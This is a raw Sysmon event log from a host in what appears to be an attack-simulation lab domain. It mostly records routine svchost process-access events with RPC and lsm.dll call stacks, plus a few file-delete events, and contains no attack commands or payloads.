12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-64C1-6064-9300-00000000AE01}872NT AUTHORITY\SYSTEMC:\Windows\system32\LogonUI.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.dbMD5=F3DC4461F59519C68ABD86B979EA9762,SHA256=5896967D61C1C716C98511DCFC267A12749D330E5DEB35ECCB4690DFA756C964,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+37c3|c:\windows\system32\SYSNTFY.dll+1dcb|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.809{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E823BA27668F27EE90EAA44AF3F91F13,SHA256=F8A02054A5C05B0B8AD3536935FB038B403A1358C32BF7B957DF690F69A7E706,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.793{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.793{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.793{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.684{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 